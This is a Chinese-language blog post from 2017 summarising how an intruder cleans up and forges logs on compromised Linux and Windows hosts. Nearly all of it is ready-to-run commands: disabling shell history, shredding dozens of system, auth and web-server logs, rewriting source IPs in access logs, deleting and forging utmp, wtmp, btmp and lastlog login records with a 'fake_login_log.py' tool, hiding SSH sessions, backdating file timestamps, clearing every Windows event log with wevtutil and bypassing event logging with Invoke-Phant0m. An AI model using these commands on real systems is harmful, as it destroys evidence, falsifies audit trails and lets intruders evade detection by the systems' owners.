Web

日志清理

日志清理的个人总结.

Posted by Rootclay on 2017-08-02

日志清理与伪造

Linux平台

无w与who记录登录:
ssh -T root@172.16.50.166 "/bin/bash -i"

挂载一个内存目录,重启消失,用于存放临时文件。mount -t ramfs ramfs /usr/tmp
系统本来就存在这样的目录/dev/shm这个文件绝对777权限

复制文件时间:touch -r /usr/sbin/sshd /dev/shm/yourfile;

首先进入/etc/profile查看管理员是否自行增加了日志日志记录功能,再看~/.bashrc有无记录,有则删

其他主要日志如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0
shred -n 100 -z -u /var/log/lastlog
shred -n 100 -z -u /var/log/telnetd
shred -n 100 -z -u /var/run/utmp
shred -n 100 -z -u /var/log/secure
shred -n 100 -z -u /var/log/wtmp
shred -n 100 -z -u /etc/wtmp
shred -n 100 -z -u /var/run/utmp
shred -n 100 -z -u /etc/utmp
shred -n 100 -z -u /var/log
shred -n 100 -z -u /var/adm
shred -n 100 -z -u /var/apache/log
shred -n 100 -z -u /var/apache/logs
shred -n 100 -z -u /usr/local/apache/log
shred -n 100 -z -u /usr/local/apache/logs
shred -n 100 -z -u /var/log/acct
shred -n 100 -z -u /var/log/xferlog
shred -n 100 -z -u /var/log/messages
shred -n 100 -z -u /var/log/proftpd/xferlog.legacy
shred -n 100 -z -u /var/log/proftpd.access_log
shred -n 100 -z -u /var/log/proftpd.xferlog
shred -n 100 -z -u /var/log/httpd/error_log
shred -n 100 -z -u /var/log/httpd/access_log
shred -n 100 -z -u /etc/httpd/logs/access_log
shred -n 100 -z -u /etc/httpd/logs/error_log
shred -n 100 -z -u /var/log/news/suck.notice
shred -n 100 -z -u /var/spool/tmp
shred -n 100 -z -u /var/spool/errors
shred -n 100 -z -u /var/spool/logs
shred -n 100 -z -u /var/spool/locks
shred -n 100 -z -u /usr/local/www/logs/thttpd_log
shred -n 100 -z -u /var/log/thttpd_log
shred -n 100 -z -u /var/log/ncftpd/misclog.txt
shred -n 100 -z -u /var/log/ncftpd.errs
shred -n 100 -z -u /var/log/auth
shred -n 100 -z -u /var/log/cron
shred -n 100 -z -u /var/log/maillog
shred -n 100 -z -u /var/log/yum.log
shred -n 100 -z -u /var/log/messages

下面是主要清理登录日志:

第一是系统secure日志:
sed -s ‘s/Your ip/you wanna replace/g’ access_log access.log security

第二是一些登录文本日志和二进制日志

1
2
3
4
5
6
7
8
9
10
11
/var/run/utmp
utmp 对应w 和 who命令,记录当前在线的用户
/var/log/wtmp
wtmp 对应last命令,记录一个用户登录与退出时间的永久记录
/var/log/btmp
btmp对应lastb命令,纪录失败的纪录
/var/log/lastlog
lastlog 对应lastlog命令,纪录最近几次成功登录的事件和最后一次不成功的登录

删除日志

1
2
3
4
5
6
7
8
9
10
11
12
13
1. 删除utmp记录,将自己从w或者who输出中隐藏
python fake_login_log.py --mode delete --type utmp --user root //删除用户为root的用户记录
2. 删除历史登录记录(wtmp),隐藏last的记录
python fake_login_log.py --mode delete --type wtmp --user root //删除用户为root的用户记录
python fake_login_log.py --mode delete --type wtmp --user root --host "127.0.0.1" //删除用户为root且登录来源host为127.0.0.1的用户记录
3. 删除btmp记录,隐藏lastb的记录,lastb为登录失败的用户记录
python fake_login_log.py --mode delete --type btmp --user root --host "172.16.50.156" //删除用户为root且登录来源host为127.0.0.1的用户记录
4. 删除lastlog记录,不能通过用户删除,只能通过host或者时间
python fake_login_log.py --mode delete --type lastlog --host "172.16.50.1" //删除来源host的用户登录记录
python fake_login_log.py --mode delete --type lastlog --date "2017-8-2 22:46:34" //删除登录时间为2017-8-2 22:46:34的用户登录记录

伪造日志

1
2
3
4
5
6
7
8
9
10
11
12
1. 伪造utmp记录,将自己从w或者who输出中伪造
python fake_login_log.py --mode add --type utmp --user nobody --tty "pts/8" --pid 25394 --date "2017-8-2 22:46:34" --host "127.0.0.1" //伪造用户为nobody的用户记录
这里伪造的时间和host可以通过who命令去找到,PID一般伪造bash或者ssh通过`ps -aux | grep ssh/bash`去寻找
2. 伪造历史登录记录(wtmp),伪造last的记录
python fake_login_log.py --mode add --type wtmp --user root --tty "pts/7" --date "2017-8-2 00:06:34" --host "127.0.0.1"
3. 伪造btmp记录,伪造lastb的记录,lastb为登录失败的用户记录
python fake_login_log.py --mode add --type btmp --user root --tty "pts/7" --date "2017-8-2 00:06:34" --host "127.0.0.1" //伪造用户为root且登录来源host为127.0.0.1的用户登录失败记录
4. 伪造lastlog记录
python fake_login_log.py --mode add --type=lastlog --user=rootclay --date="2017-7-24 14:22:07" --tty "pts/2" --host "127.0.0.1" //伪造用户为rootclay 时间2017-7-24 14:22:07 来源登录ip为127.0.0.1的用户登录记录

Windows平台

Windows日志包括五个类别:

  1. 应用程序
  2. 安全
  3. Setup
  4. 系统
  5. 转发事件

wevtutil清除

1
2
3
4
5
wevtutil.exe cl application
wevtutil.exe cl Security
wevtutil.exe cl setup
wevtutil.exe cl system
wevtutil.exe cl forwardedevents

直接绕过日志:
Invoke-Phant0m